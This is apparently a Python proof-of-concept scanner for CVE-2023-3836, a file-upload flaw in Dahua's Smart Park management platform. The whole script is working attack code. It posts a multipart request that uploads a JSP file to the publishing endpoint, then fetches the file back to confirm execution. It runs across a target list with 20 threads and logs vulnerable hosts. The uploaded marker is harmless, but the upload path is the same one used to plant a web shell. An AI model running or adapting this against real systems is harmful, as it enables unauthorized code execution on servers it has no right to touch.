README.md
Rendering markdown...
import argparse
import textwrap
import requests
import json
requests.packages.urllib3.disable_warnings()
from multiprocessing.dummy import Pool
from rich.console import Console
console = Console()
text = """
██████╗██╗ ██╗███████╗ ██████╗ ██████╗ ██████╗ ██████╗ ██████╗ █████╗ ██████╗ ██████╗
██╔════╝██║ ██║██╔════╝ ╚════██╗██╔═████╗╚════██╗╚════██╗ ╚════██╗██╔══██╗╚════██╗██╔════╝
██║ ██║ ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝ █████╔╝█████╗█████╔╝╚█████╔╝ █████╔╝███████╗
██║ ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝ ╚═══██╗╚════╝╚═══██╗██╔══██╗ ╚═══██╗██╔═══██╗
╚██████╗ ╚████╔╝ ███████╗ ███████╗╚██████╔╝███████╗██████╔╝ ██████╔╝╚█████╔╝██████╔╝╚██████╔╝
╚═════╝ ╚═══╝ ╚══════╝ ╚══════╝ ╚═════╝ ╚══════╝╚═════╝ ╚═════╝ ╚════╝ ╚═════╝ ╚═════╝
@version:1.0.0
@author:zt-byte
"""
def current(text):
console.print(f"[+]{text} 存在漏洞", style="bold green")
def no_current(text):
console.print(f"[+]{text} 存在漏洞", style="bold yellow")
def ban(text):
console.print(text, style="bold blue")
headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15", "Content-Type": "multipart/form-data; boundary=dd8f988919484abab3816881c55272a7", "Accept-Encoding": "gzip, deflate", "Connection": "close"}
data = "--dd8f988919484abab3816881c55272a7\r\nContent-Disposition: form-data; name=\"Filedata\"; filename=\"0EaE10E7dF5F10C2.jsp\"\r\n\r\n<%out.println(\"vultest\");%>\r\n--dd8f988919484abab3816881c55272a7\r\nContent-Disposition: form-data; name=\"poc\"\r\n\r\npoc\r\n--dd8f988919484abab3816881c55272a7\r\nContent-Disposition: form-data; name=\"Submit\"\r\n\r\nsubmit\r\n--dd8f988919484abab3816881c55272a7--"
def poc(url):
url_end = url + "/publishing/publishing/material/file/video"
try:
response = requests.post(url_end, headers=headers, data=data, verify=False,timeout=4)
dict = json.loads(response.text)
path = dict["data"]["path"]
url = url+"/publishingImg/"+path
text = requests.get(url,verify = False).text
if "vultest" in text:
with open("result.txt","a",encoding="utf-8") as file:
file.write(url+"\n")
current(url_end)
else:
print(f"{url}不存在漏洞")
except:
pass
def op(file):
list = []
with open(f"{file}","r",encoding="utf-8") as f:
urls = f.readlines()
for url in urls:
url = url.strip()
list.append(url)
return list
if __name__ == '__main__':
ban(text)
parser = argparse.ArgumentParser(description='大华智慧园区综合管理平台publishing文件上传poc',
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog=textwrap.dedent(
'''example: python CVE-2023-3836.py -f ip.txt'''))
parser.add_argument("-f", "--file", dest="file", type=str, help="要查询的url文件,example:urls.txt")
args = parser.parse_args()
list = op(args.file)
mp = Pool(20) # 20自己指定的线程数
mp.map(poc, list) # printNumber 函数 target 目标列表
mp.close()
mp.join()